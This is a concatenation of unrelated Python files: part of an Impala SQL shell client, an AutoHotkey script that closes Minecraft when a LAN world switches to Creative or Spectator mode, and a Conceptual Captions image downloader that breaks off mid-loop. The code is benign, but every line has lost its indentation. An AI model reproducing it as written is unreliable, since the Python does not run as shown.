writer.writerows(rows)
finally:
if output_file:
output_file.close()
# Simple Impala shell. Can issue queries (with configurable options)
# Basic usage: type connect <host:port> to connect to an impalad
# Then issue queries or other commands. Tab-completion should show the set of
# available commands.
# Methods that implement shell commands return a boolean tuple (stop, status)
# stop is a flag the command loop uses to continue/discontinue the prompt.
# Status tells the caller that the command completed successfully.
# TODO: (amongst others)
# - Column headers / metadata support
# - A lot of rpcs return a verbose TStatus from thrift/Status.thrift
# This will be useful for better error handling. The next iteration
# of the shell should handle this return parameter.
class ImpalaShell(cmd.Cmd):
DISCONNECTED_PROMPT = "[Not connected] > "
# If not connected to an impalad, the server version is unknown.
UNKNOWN_SERVER_VERSION = "Not Connected"
# Commands are terminated with the following delimiter.
CMD_DELIM = ';'
DEFAULT_DB = 'default'
def __init__(self, options):
cmd.Cmd.__init__(self)
self.user = getpass.getuser()
self.is_alive = True
self.use_kerberos = options.use_kerberos
self.verbose = options.verbose
self.kerberos_service_name = options.kerberos_service_name
self.impalad = None
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
self.connected = False
self.imp_service = None
self.transport = None
self.fetch_batch_size = 1024
self.default_query_options = {}
self.set_query_options = {}
self.query_state = QueryState._NAMES_TO_VALUES
self.refresh_after_connect = options.refresh_after_connect
self.current_db = options.default_db
self.history_file = os.path.expanduser("~/.impalahistory")
self.server_version = ImpalaShell.UNKNOWN_SERVER_VERSION
self.show_profiles = options.show_profiles
# Stores the state of user input until a delimiter is seen.
self.partial_cmd = str()
# Stores the old prompt while the user input is incomplete.
self.cached_prompt = str()
# Tracks query handle of the last query executed. Used by the 'profile' command.
self.last_query_handle = None
self.output_writer = None
if options.output_file:
self.output_writer =\
OutputWriter(options.output_file, options.output_file_field_delim)
try:
self.readline = __import__('readline')
self.readline.set_history_length(HISTORY_LENGTH)
except ImportError:
self.readline = None
if options.impalad != None:
self.do_connect(options.impalad)
# We handle Ctrl-C ourselves, using an Event object to signal cancellation
# requests between the handler and the main shell thread. Ctrl-C is explicitly
# not intercepted during an rpc, as it may interrupt system calls leaving
# the underlying socket unusable.
self.is_interrupted = threading.Event()
signal.signal(signal.SIGINT, self.__signal_handler)
def __print_options(self, options):
if not options:
print '\tNo options available.'
else:
print '\n'.join(["\t%s: %s" % (k,v) for (k,v) in options.iteritems()])
def __options_to_string_list(self):
return ["%s=%s" % (k,v) for (k,v) in self.set_query_options.iteritems()]
def __build_default_query_options_dict(self):
# The default query options are retrieved from a rpc call, and are dependent
# on the impalad to which a connection has been established. They need to be
# refreshed each time a connection is made. This is particularly helpful when
# there is a version mismatch between the shell and the impalad.
get_default_query_options = self.imp_service.get_default_configuration(False)
options, status = self.__do_rpc(lambda: get_default_query_options)
if status != RpcStatus.OK:
print 'Unable to retrieve default query options'
for option in options:
self.default_query_options[option.key.upper()] = option.value
def do_shell(self, args):
"""Run a command on the shell
Usage: shell <cmd>
! <cmd>
"""
try:
os.system(args)
except Exception, e:
print 'Error running command : %s' % e
return True
def sanitise_input(self, args, interactive=True):
"""Convert the command to lower case, so it's recognized"""
# A command terminated by a semi-colon is legal. Check for the trailing
# semi-colons and strip them from the end of the command.
args = args.strip()
tokens = args.split(' ')
# The first token is converted into lower case to route it to the
# appropriate command handler. This only applies to the first line of user input.
# Modifying tokens in subsequent lines may change the semantics of the command,
# so do not modify the text.
if not self.partial_cmd:
# The first token is the command.
# If it's EOF, call do_quit()
if tokens[0] == 'EOF':
return 'quit'
else:
tokens[0] = tokens[0].lower()
if interactive:
args = self.__check_for_command_completion(' '.join(tokens).strip())
args = args.rstrip(ImpalaShell.CMD_DELIM)
else:
# Strip all the non-interactive commands of the delimiter.
args = ' '.join(tokens).rstrip(ImpalaShell.CMD_DELIM)
return args
def __check_for_command_completion(self, cmd):
"""Check for a delimiter at the end of user input.
The end of the user input is scanned for a legal delimiter.
If a delimiter is not found:
- Input is not sent to onecmd()
- onecmd() is a method in Cmd which routes the user input to the
appropriate method. An empty string results in a no-op.
- Input is removed from history.
- Input is appended to partial_cmd
If a delimiter is found:
- The contents of partial_cmd are put in history, as they represent
a completed command.
- The contents are passed to the appropriate method for execution.
- partial_cmd is reset to an empty string.
"""
if self.readline:
current_history_len = self.readline.get_current_history_length()
# Input is incomplete, store the contents and do nothing.
if not cmd.endswith(ImpalaShell.CMD_DELIM):
# The user input is incomplete, change the prompt to reflect this.
if not self.partial_cmd and cmd:
self.cached_prompt = self.prompt
self.prompt = '> '.rjust(len(self.cached_prompt))
# partial_cmd is already populated, add the current input after a newline.
if self.partial_cmd and cmd:
self.partial_cmd = "%s %s" % (self.partial_cmd, cmd)
else:
# If the input string is empty or partial_cmd is empty.
self.partial_cmd = "%s%s" % (self.partial_cmd, cmd)
# Remove the most recent item from history if:
# -- The current state of user input is incomplete.
# -- The most recent user input is not an empty string
if self.readline and current_history_len > 0 and cmd:
self.readline.remove_history_item(current_history_len - 1)
# An empty string results in a no-op. Look at emptyline()
return str()
elif self.partial_cmd: # input ends with a delimiter and partial_cmd is not empty
if cmd != ImpalaShell.CMD_DELIM:
completed_cmd = "%s %s" % (self.partial_cmd, cmd)
else:
completed_cmd = "%s%s" % (self.partial_cmd, cmd)
# Reset partial_cmd to an empty string
self.partial_cmd = str()
# Replace the most recent history item with the completed command.
if self.readline and current_history_len > 0:
self.readline.replace_history_item(current_history_len - 1, completed_cmd)
# Revert the prompt to its earlier state
self.prompt = self.cached_prompt
else: # Input has a delimiter and partial_cmd is empty
completed_cmd = cmd
return completed_cmd
def __signal_handler(self, signal, frame):
self.is_interrupted.set()
def precmd(self, args):
# TODO: Add support for multiple commands on the same line.
self.is_interrupted.clear()
return self.sanitise_input(args)
def postcmd(self, status, args):
"""Hack to make non interactive mode work"""
self.is_interrupted.clear()
# cmd expects return of False to keep going, and True to quit.
# Shell commands return True on success, False on error, and None to quit, so
# translate between them.
# TODO : Remove in the future once shell and Impala query processing can be separated.
if status == None:
return True
else:
return False
def do_set(self, args):
"""Set or display query options.
Display query options:
Usage: SET
Set query options:
Usage: SET <option>=<value>
"""
# TODO: Expand set to allow for setting more than just query options.
if not self.connected:
print "Query options currently set:"
self.__print_options(self.set_query_options)
print "Connect to an impalad to see the default query options"
return True
if len(args) == 0:
print "Default query options:"
self.__print_options(self.default_query_options)
print "Query options currently set:"
self.__print_options(self.set_query_options)
return True
tokens = args.split("=")
if len(tokens) != 2:
print "Error: SET <option>=<value>"
return False
option_upper = tokens[0].upper()
if option_upper not in self.default_query_options.keys():
print "Unknown query option: %s" % (tokens[0],)
print "Available query options, with their default values are:"
self.__print_options(self.default_query_options)
return False
self.set_query_options[option_upper] = tokens[1]
self.__print_if_verbose('%s set to %s' % (option_upper, tokens[1]))
return True
def do_unset(self, args):
"""Unset a query option"""
if len(args.split()) != 1:
print 'Usage: unset <option>'
return False
option = args.upper()
if self.set_query_options.get(option):
print 'Unsetting %s' % option
del self.set_query_options[option]
else:
print "No option called %s is set" % args
return True
def do_quit(self, args):
"""Quit the Impala shell"""
self.__print_if_verbose("Goodbye")
self.is_alive = False
# None is crutch to tell shell loop to quit
return None
def do_exit(self, args):
"""Exit the impala shell"""
return self.do_quit(args)
def do_connect(self, args):
"""Connect to an Impalad instance:
Usage: connect <hostname:port>
connect <hostname>, defaults to port 21000
"""
tokens = args.split(" ")
if len(tokens) != 1:
print ("CONNECT takes exactly one argument: <hostname:port> or"
" <hostname> of the impalad to connect to")
return False
# validate the connection string.
host_port = [val for val in tokens[0].split(':') if val.strip()]
if (':' in tokens[0] and len(host_port) != 2) or (not host_port):
print "Connect string must be of form <hostname:port> or <hostname>"
return False
elif len(host_port) == 1:
host_port.append(21000)
self.impalad = tuple(host_port)
if self.__connect():
self.__print_if_verbose('Connected to %s:%s' % self.impalad)
self.__print_if_verbose('Server version: %s' % self.server_version)
self.prompt = "[%s:%s] > " % self.impalad
if self.refresh_after_connect:
self.cmdqueue.append('refresh' + ImpalaShell.CMD_DELIM)
if self.current_db:
self.cmdqueue.append('use %s' % self.current_db + ImpalaShell.CMD_DELIM)
self.__build_default_query_options_dict()
self.last_query_handle = None
# In the case that we lost connection while a command was being entered,
# we may have a dangling command, clear partial_cmd
self.partial_cmd = str()
# Check if any of query options set by the user are inconsistent
# with the impalad being connected to
for set_option in self.set_query_options.keys():
if set_option not in set(self.default_query_options.keys()):
print ('%s is not supported for the impalad being '
'connected to, ignoring.' % set_option)
del self.set_query_options[set_option]
return True
def __connect(self):
if self.transport is not None:
self.transport.close()
self.transport = None
self.connected = False
self.server_version = ImpalaShell.UNKNOWN_SERVER_VERSION
try:
self.transport = self.__get_transport()
self.transport.open()
protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.imp_service = ImpalaService.Client(protocol)
try:
result = self.imp_service.PingImpalaService()
self.server_version = result.version
self.connected = True
except Exception, e:
print ("Error: Unable to communicate with impalad service. This service may not "
"be an impalad instance. Check host:port and try again.")
self.transport.close()
raise
except Exception, e:
print "Error connecting: %s, %s" % (type(e),e)
# If a connection to another impalad failed while already connected
# reset the prompt to disconnected.
self.prompt = self.DISCONNECTED_PROMPT
return self.connected
def __get_transport(self):
"""Create a Transport.
A non-kerberized impalad just needs a simple buffered transport. For
the kerberized version, a sasl transport is created.
"""
sock = TSocket(self.impalad[0], int(self.impalad[1]))
if not self.use_kerberos:
return TBufferedTransport(sock)
# Initializes a sasl client
def sasl_factory():
sasl_client = sasl.Client()
sasl_client.setAttr("host", self.impalad[0])
sasl_client.setAttr("service", self.kerberos_service_name)
sasl_client.init()
return sasl_client
# GSSAPI is the underlying mechanism used by kerberos to authenticate.
return TSaslClientTransport(sasl_factory, "GSSAPI", sock)
def __get_sleep_interval(self, start_time):
"""Returns a step function of time to sleep in seconds before polling
again. Maximum sleep is 1s, minimum is 0.1s"""
elapsed = time.time() - start_time
if elapsed < 10.0:
return 0.1
elif elapsed < 60.0:
return 0.5
return 1.0
def __create_beeswax_query_handle(self):
handle = BeeswaxService.Query()
handle.hadoop_user = self.user
return handle
def __construct_table_header(self, handle):
""" Constructs the table header for a given query handle.
Should be called after the query has finished and before data is fetched. All data
is left aligned.
"""
metadata = self.__do_rpc(lambda: self.imp_service.get_results_metadata(handle))
table = prettytable.PrettyTable()
for field_schema in metadata[0].schema.fieldSchemas:
table.add_column(field_schema.name, [])
table.align = "l"
return table
def __expect_result_metadata(self, query_str):
""" Given a query string, return True if impalad expects result metadata"""
excluded_query_types = ['use', 'alter', 'create', 'drop']
if True in set(map(query_str.startswith, excluded_query_types)):
return False
return True
def __query_with_results(self, query):
self.__print_if_verbose("Query: %s" % (query.query,))
start, end = time.time(), 0
(handle, status) = self.__do_rpc(lambda: self.imp_service.query(query))
if self.is_interrupted.isSet():
if status == RpcStatus.OK:
self.__cancel_query(handle)
return False
if status != RpcStatus.OK:
return False
loop_start = time.time()
while True:
query_state = self.__get_query_state(handle)
if query_state == self.query_state["FINISHED"]:
break
elif query_state == self.query_state["EXCEPTION"]:
print 'Query aborted, unable to fetch data'
if self.connected:
log, status = self._ImpalaShell__do_rpc(
lambda: self.imp_service.get_log(handle.log_context))
print log
return self.__close_query_handle(handle)
else:
return False
elif self.is_interrupted.isSet():
return self.__cancel_query(handle)
time.sleep(self.__get_sleep_interval(loop_start))
# impalad does not support the fetching of metadata for certain types of queries.
if not self.__expect_result_metadata(query.query):
self.__close_query_handle(handle)
return True
table = self.__construct_table_header(handle)
# Results are ready, fetch them till they're done.
self.__print_if_verbose('Query finished, fetching results ...')
result_rows = []
num_rows_fetched = 0
while True:
# Fetch rows in batches of at most fetch_batch_size
(results, status) = self.__do_rpc(lambda: self.imp_service.fetch(
handle, False, self.fetch_batch_size))
if self.is_interrupted.isSet() or status != RpcStatus.OK:
# Worth trying to clean up the query even if fetch failed
if self.connected:
self.__close_query_handle(handle)
return False
num_rows_fetched += len(results.data)
result_rows.extend(results.data)
if len(result_rows) >= self.fetch_batch_size or not results.has_more:
rows = [r.split('\t') for r in result_rows]
try:
map(table.add_row, rows)
# Clear the rows that have been added. The goal is to stream the table
# in batch_size chunks.
print table
table.clear_rows()
except Exception, e:
# beeswax returns each row as a tab separated string. If a string column
# value in a row has tabs, it will break the row split. Default to displaying
# raw results. This will change with a move to the hiverserver2 interface.
# Reference: https://issues.cloudera.org/browse/IMPALA-116
print ('\n').join(result_rows)
result_rows = []
if self.output_writer:
# Writing to output files is also impacted by the beeswax bug mentioned
# above. This means that if a string column has a tab, it will break the row
# split causing the wrong number of fields to be written to the output file.
# Reference: https://issues.cloudera.org/browse/IMPALA-116
self.output_writer.write_rows(rows)
if not results.has_more:
break
# Don't include the time to get the runtime profile in the query execution time
end = time.time()
self.__print_runtime_profile_if_enabled(handle)
self.__print_if_verbose(
"Returned %d row(s) in %2.2fs" % (num_rows_fetched, end - start))
self.last_query_handle = handle
return self.__close_query_handle(handle)
def __close_query_handle(self, handle):
"""Close the query handle"""
self.__do_rpc(lambda: self.imp_service.close(handle))
return True
def __print_runtime_profile_if_enabled(self, handle):
if self.show_profiles:
self.__print_runtime_profile(handle)
def __print_runtime_profile(self, handle):
profile = self.__get_runtime_profile(handle)
if profile is not None:
print "Query Runtime Profile:"
print profile
def __print_if_verbose(self, message):
if self.verbose:
print message
def __parse_table_name_arg(self, arg):
""" Parses an argument string and returns the result as a db name, table name combo.
If the table name was not fully qualified, the current database is returned as the db.
Otherwise, the table is split into db/table name parts and returned.
If an invalid format is provided, None is returned.
"""
if not arg:
return None
# If a multi-line argument, the name might be split across lines
arg = arg.replace('\n','')
# Get the database and table name, using the current database if the table name
# wasn't fully qualified.
db_name, tbl_name = self.current_db, arg
if db_name is None:
db_name = ImpalaShell.DEFAULT_DB
db_table_name = arg.split('.')
if len(db_table_name) == 1:
return db_name, db_table_name[0]
if len(db_table_name) == 2:
return db_table_name
def do_alter(self, args):
query = self.__create_beeswax_query_handle()
query.query = "alter %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_create(self, args):
query = self.__create_beeswax_query_handle()
query.query = "create %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_drop(self, args):
query = self.__create_beeswax_query_handle()
query.query = "drop %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_profile(self, args):
"""Prints the runtime profile of the last INSERT or SELECT query executed."""
if len(args) > 0:
print "'profile' does not accept any arguments"
return False
elif self.last_query_handle is None:
print 'No previous query available to profile'
return False
self.__print_runtime_profile(self.last_query_handle)
return True
def do_select(self, args):
"""Executes a SELECT... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "select %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_use(self, args):
"""Executes a USE... query"""
query = self.__create_beeswax_query_handle()
query.query = "use %s" % (args,)
query.configuration = self.__options_to_string_list()
result = self.__query_with_results(query)
if result:
self.current_db = args
return result
def do_show(self, args):
"""Executes a SHOW... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "show %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_describe(self, args):
"""Executes a DESCRIBE... query, fetching all rows"""
query = self.__create_beeswax_query_handle()
query.query = "describe %s" % (args,)
query.configuration = self.__options_to_string_list()
return self.__query_with_results(query)
def do_desc(self, args):
return self.do_describe(args)
def do_insert(self, args):
"""Executes an INSERT query"""
query = self.__create_beeswax_query_handle()
query.query = "insert %s" % (args,)
query.configuration = self.__options_to_string_list()
print "Query: %s" % (query.query,)
start, end = time.time(), 0
(handle, status) = self.__do_rpc(lambda: self.imp_service.query(query))
if status != RpcStatus.OK:
return False
query_successful = True
while True:
query_state = self.__get_query_state(handle)
if query_state == self.query_state["FINISHED"]:
break
elif query_state == self.query_state["EXCEPTION"]:
print 'Query failed'
if self.connected:
# Retrieve error message (if any) from log.
log, status = self._ImpalaShell__do_rpc(
lambda: self.imp_service.get_log(handle.log_context))
print log,
query_successful = False
break
else:
return False
elif self.is_interrupted.isSet():
return self.__cancel_query(handle)
time.sleep(0.05)
(insert_result, status) = self.__do_rpc(lambda: self.imp_service.CloseInsert(handle))
end = time.time()
if status != RpcStatus.OK or self.is_interrupted.isSet():
return False
if query_successful:
self.__print_runtime_profile_if_enabled(handle)
num_rows = sum([int(k) for k in insert_result.rows_appended.values()])
self.__print_if_verbose("Inserted %d rows in %2.2fs" % (num_rows, end - start))
self.last_query_handle = handle
return query_successful
def __cancel_query(self, handle):
"""Cancel a query on a keyboard interrupt from the shell."""
print 'Cancelling query ...'
# Cancel sets query_state to EXCEPTION before calling cancel() in the
# co-ordinator, so we don't need to wait.
(_, status) = self.__do_rpc(lambda: self.imp_service.Cancel(handle))
if status != RpcStatus.OK:
return False
return True
def __get_query_state(self, handle):
state, status = self.__do_rpc(lambda : self.imp_service.get_state(handle))
if status != RpcStatus.OK:
return self.query_state["EXCEPTION"]
return state
def __get_runtime_profile(self, handle):
profile, status = self.__do_rpc(lambda: self.imp_service.GetRuntimeProfile(handle))
if status == RpcStatus.OK and profile:
return profile
def __do_rpc(self, rpc):
"""Creates a child thread which executes the provided callable.
Blocks until the child thread terminates. Reads its results, if any,
from a Queue object. The child thread puts its results in the Queue object
upon completion.
"""
# The queue is responsible for passing the rpc results from __do_rpc_thread
# to __do_rpc.
# TODO: Investigate whether this can be done without using a Queue object.
rpc_results = Queue()
rpc_thread = threading.Thread(target=self.__do_rpc_thread, args=[rpc, rpc_results])
rpc_thread.start()
rpc_thread.join()
# The results should be in the queue. If they're not, return (None, RpcStatus.ERROR)
try:
results = rpc_results.get_nowait()
except Empty:
# Unexpected exception in __do_rpc_thread.
print 'Unexpected exception, no results returned.'
results = (None, RpcStatus.ERROR)
return results
def __do_rpc_thread(self, rpc, rpc_results):
"""Executes the RPC lambda provided with some error checking.
Puts the result tuple in the result queue. The result tuple is
(rpc_result, RpcStatus.OK) if the rpc succeeded, (None, RpcStatus.ERROR)
if it failed. If an exception occurs that cannot be recovered from,
the connection will be closed and self.connected will be set to False.
(None, RpcStatus.ERROR) will be put in the queue.
"""
if not self.connected:
print "Not connected (use CONNECT to establish a connection)"
rpc_results.put((None, RpcStatus.ERROR))
try:
ret = rpc()
status = RpcStatus.OK
# TODO: In the future more advanced error detection/handling can be done based on
# the TStatus return value. For now, just print any error(s) that were encountered
# and validate that the result of the operation was a success.
if ret is not None and isinstance(ret, TStatus):
if ret.status_code != TStatusCode.OK:
if ret.error_msgs:
print 'RPC Error: %s' % '\n'.join(ret.error_msgs)
status = RpcStatus.ERROR
rpc_results.put((ret, status))
except BeeswaxService.QueryNotFoundException, q:
print 'Error: Stale query handle'
# BeeswaxException prints out the entire object; printing
# just the message is far more readable/helpful.
except BeeswaxService.BeeswaxException, b:
print "ERROR: %s" % (b.message,)
except TTransportException, e:
print "Error communicating with impalad: %s" % (e,)
self.connected = False
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
except TApplicationException, t:
print "Application Exception : %s" % (t,)
except Exception, u:
print 'Unknown Exception : %s' % (u,)
self.connected = False
self.prompt = ImpalaShell.DISCONNECTED_PROMPT
rpc_results.put((None, RpcStatus.ERROR))
def do_explain(self, args):
"""Explain the query execution plan"""
query = self.__create_beeswax_query_handle()
# Args is all text except for 'explain', so no need to strip it out
query.query = args
query.configuration = self.__options_to_string_list()
print "Explain query: %s" % (query.query,)
(explanation, status) = self.__do_rpc(lambda: self.imp_service.explain(query))
if status != RpcStatus.OK:
return False
print explanation.textual
return True
def do_refresh(self, args):
"""Reload the Impalad catalog"""
status = RpcStatus.ERROR
if not args:
(_, status) = self.__do_rpc(lambda: self.imp_service.ResetCatalog())
if status == RpcStatus.OK:
self.__print_if_verbose("Successfully refreshed catalog")
else:
db_table_name = self.__parse_table_name_arg(args)
if db_table_name is None:
print 'Usage: refresh [databaseName.][tableName]'
return False
(_, status) = self.__do_rpc(
lambda: self.imp_service.ResetTable(TResetTableReq(*db_table_name)))
if status == RpcStatus.OK:
self.__print_if_verbose(
"Successfully refreshed table: %s" % '.'.join(db_table_name))
return status == RpcStatus.OK
def do_history(self, args):
"""Display command history"""
# Deal with a readline peculiarity. When history does not exist,
# readline returns 1 as the history length and stores 'None' at index 0.
if self.readline and self.readline.get_current_history_length() > 0:
for index in xrange(1, self.readline.get_current_history_length() + 1):
cmd = self.readline.get_history_item(index)
print '[%d]: %s' % (index, cmd)
else:
print 'readline module not found, history is not supported.'
return True
def preloop(self):
"""Load the history file if it exists"""
if self.readline:
try:
self.readline.read_history_file(self.history_file)
except IOError, i:
print 'Unable to load history: %s' % i
def postloop(self):
"""Save session commands in history."""
if self.readline:
try:
self.readline.write_history_file(self.history_file)
except IOError, i:
print 'Unable to save history: %s' % i
def default(self, args):
print "Unrecognized command"
return True
def emptyline(self):
"""If an empty line is entered, do nothing"""
return True
def do_version(self, args):
"""Prints the Impala build version"""
print "Shell version: %s" % VERSION_STRING
print "Server version: %s" % self.server_version
return True
WELCOME_STRING = """Welcome to the Impala shell. Press TAB twice to see a list of \
available commands.
Copyright (c) 2012 Cloudera, Inc. All rights reserved.
(Shell build version: %s)""" % VERSION_STRING
def parse_query_text(query_text):
"""Parse query file text and filter comments """
queries = sqlparse.split(query_text)
return map(strip_comments_from_query, queries)
def strip_comments_from_query(query):
"""Strip comments from an individual query """
#TODO: Make query format configurable by the user.
return sqlparse.format(query, strip_comments=True, reindent=True)
def execute_queries_non_interactive_mode(options):
"""Run queries in non-interactive mode."""
queries = []
if options.query_file:
try:
query_file_handle = open(options.query_file, 'r')
queries = parse_query_text(query_file_handle.read())
query_file_handle.close()
except Exception, e:
print 'Error: %s' % e
sys.exit(1)
elif options.query:
queries = parse_query_text(options.query)
shell = ImpalaShell(options)
# The impalad was specified on the command line and the connection failed.
# Return with an error, no need to process the query.
if options.impalad and shell.connected == False:
sys.exit(1)
queries = shell.cmdqueue + queries
# Deal with case.
sanitized_queries = []
for query in queries:
sanitized_queries.append(shell.sanitise_input(query, interactive=False))
for query in sanitized_queries:
if not shell.onecmd(query):
print 'Could not execute command: %s' % query
if not options.ignore_query_failure:
sys.exit(1)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-i", "--impalad", dest="impalad", default=socket.getfqdn(),
help="<host:port> of impalad to connect to")
parser.add_option("-q", "--query", dest="query", default=None,
help="Execute a query without the shell")
parser.add_option("-f", "--query_file", dest="query_file", default=None,
help="Execute the queries in the query file, delimited by ;")
parser.add_option("-k", "--kerberos", dest="use_kerberos", default=False,
action="store_true", help="Connect to a kerberized impalad")
parser.add_option("-o", "--output_file", dest="output_file", default=None,
help="If set, query results will be saved to the given file as well "\
"as output to the console. Results from multiple queries will be "\
"be append to the same file")
parser.add_option("--output_file_field_delim", dest="output_file_field_delim",
default=',', help="Field delimiter to use in the output file")
parser.add_option("-s", "--kerberos_service_name",
dest="kerberos_service_name", default=None,
help="Service name of a kerberized impalad, default is 'impala'")
parser.add_option("-V", "--verbose", dest="verbose", default=True, action="store_true",
help="Enable verbose output")
parser.add_option("-p", "--show_profiles", dest="show_profiles", default=False,
action="store_true",
help="Always display query profiles after execution")
parser.add_option("--quiet", dest="verbose", default=True, action="store_false",
help="Disable verbose output")
parser.add_option("-v", "--version", dest="version", default=False, action="store_true",
help="Print version information")
parser.add_option("-c", "--ignore_query_failure", dest="ignore_query_failure",
default=False, action="store_true", help="Continue on query failure")
parser.add_option("-r", "--refresh_after_connect", dest="refresh_after_connect",
default=False, action="store_true",
help="Refresh Impala catalog after connecting")
parser.add_option("-d", "--database", dest="default_db", default=None,
help="Issue a use database command on startup.")
options, args = parser.parse_args()
# Arguments that could not be parsed are stored in args. Print an error and exit.
if len(args) > 0:
print 'Error, could not parse arguments "%s"' % (' ').join(args)
parser.print_help()
sys.exit(1)
if options.version:
print VERSION_STRING
sys.exit(0)
if options.use_kerberos:
# The sasl module is bundled with the shell.
try:
import sasl
except ImportError:
print 'sasl not found.'
sys.exit(1)
from thrift_sasl import TSaslClientTransport
# The service name defaults to 'impala' if not specified by the user.
if not options.kerberos_service_name:
options.kerberos_service_name = 'impala'
print "Using service name '%s' for kerberos" % options.kerberos_service_name
elif options.kerberos_service_name:
print 'Kerberos not enabled, ignoring service name'
if options.output_file:
try:
# Make sure the given file can be opened for writing. This will also clear the file
# if successful.
open(options.output_file, 'wb')
except IOError, e:
print 'Error opening output file for writing: %s' % e
sys.exit(1)
if options.query or options.query_file:
execute_queries_non_interactive_mode(options)
sys.exit(0)
intro = WELCOME_STRING
shell = ImpalaShell(options)
while shell.is_alive:
try:
shell.cmdloop(intro)
except KeyboardInterrupt:
intro = '\n'
|
main.py
|
from time import sleep
from ahk import AHK
import os
from threading import Thread
ahk = AHK()
def read_file(file):
with open(file, 'r') as f:
read = f.read()
return read
def write_to_file(file, what):
with open(file, 'w') as f:
f.truncate(0)
f.write(what)
def ask_for_settings():
logs = input('input your logs folder: ')
return logs
# creating settings.txt if it doesn't exist
if os.path.isfile('settings.txt') == False:
with open('settings.txt', 'w') as f:
f.truncate(0)
# checking if settings.txt is empty
if os.stat('settings.txt').st_size == 0:
# if it is, ask user for settings
logs = ask_for_settings()
write_to_file('settings.txt', logs)
else:
# else, ask the user whether they want to change settings
to_change_settings = input('do you wanna change your logs path? (Y/N): ')
if to_change_settings.upper() == 'Y':
logs = ask_for_settings()
write_to_file('settings.txt', logs)
else:
logs = read_file('settings.txt')
# checks if 'latest.log' exists in logs path
if os.path.isfile(f'{logs}\\latest.log'):
log = f'{logs}\\latest.log'
else:
print(f"latest.log doesn't exist in your logs path '{logs}' (you probably provided a wrong path, restart the program)")
raise SystemExit(1)  # without a valid log file there is nothing to monitor
print("starting to check! (don't close this window)")
def warning():
ahk.run_script('''
MsgBox Don't try to check! (first and last warning)
''')
def close_game():
ahk.run_script('''
SetTitleMatchMode 2
WinGet PID, PID, Minecraft
Process, Close, %PID%
''')
def wait_for_minecraft():
ahk.run_script('''
SetTitleMatchMode 2
WinWait Minecraft* 1.16
''')
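# Outer loop: tail latest.log; once a world is opened to LAN ("Local game hosted on port"),
# warn the player, then watch for a switch to Spectator/Creative mode and close the game,
# or stop watching when the player leaves the world.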
while True:
sleep(0.02)
with open(log, 'r') as f:
lines = f.readlines()
last_line = lines[-1]
if 'Local game hosted on port' in last_line:
Thread(target=warning).start()
while True:
sleep(0.02)
with open(log, 'r') as f:
lines = f.readlines()
last_line = lines[-1]
if 'Set own game mode to Spectator Mode' in last_line or 'Set own game mode to Creative Mode' in last_line:
# if user changes his gamemode to spectator or creative, close the game
close_game()
wait_for_minecraft()
break
if 'Stopping singleplayer server as player logged out' in last_line or 'Stopping worker threads' in last_line:
# else if user quits the world, stop checking for spectator or creative
break
|
parse_conceptual.py
|
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
for i in range(2):
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
except BaseException:
is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
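# Checkpoint helper: before overwriting an existing pickle, copy it aside as
# <out_path minus .pkl>_<recover_index>.pkl; callers alternate recover_index between
# 0 and 1 so the two most recent snapshots survive an interrupted write.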
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
except BaseException:
return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
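# Each worker owns conceptual_<suffix>_<thread_id>.pkl, which records the URLs already
# parsed plus the caption/url info per downloaded image, so an interrupted run can be
# resumed without re-fetching images that are already on disk.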
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
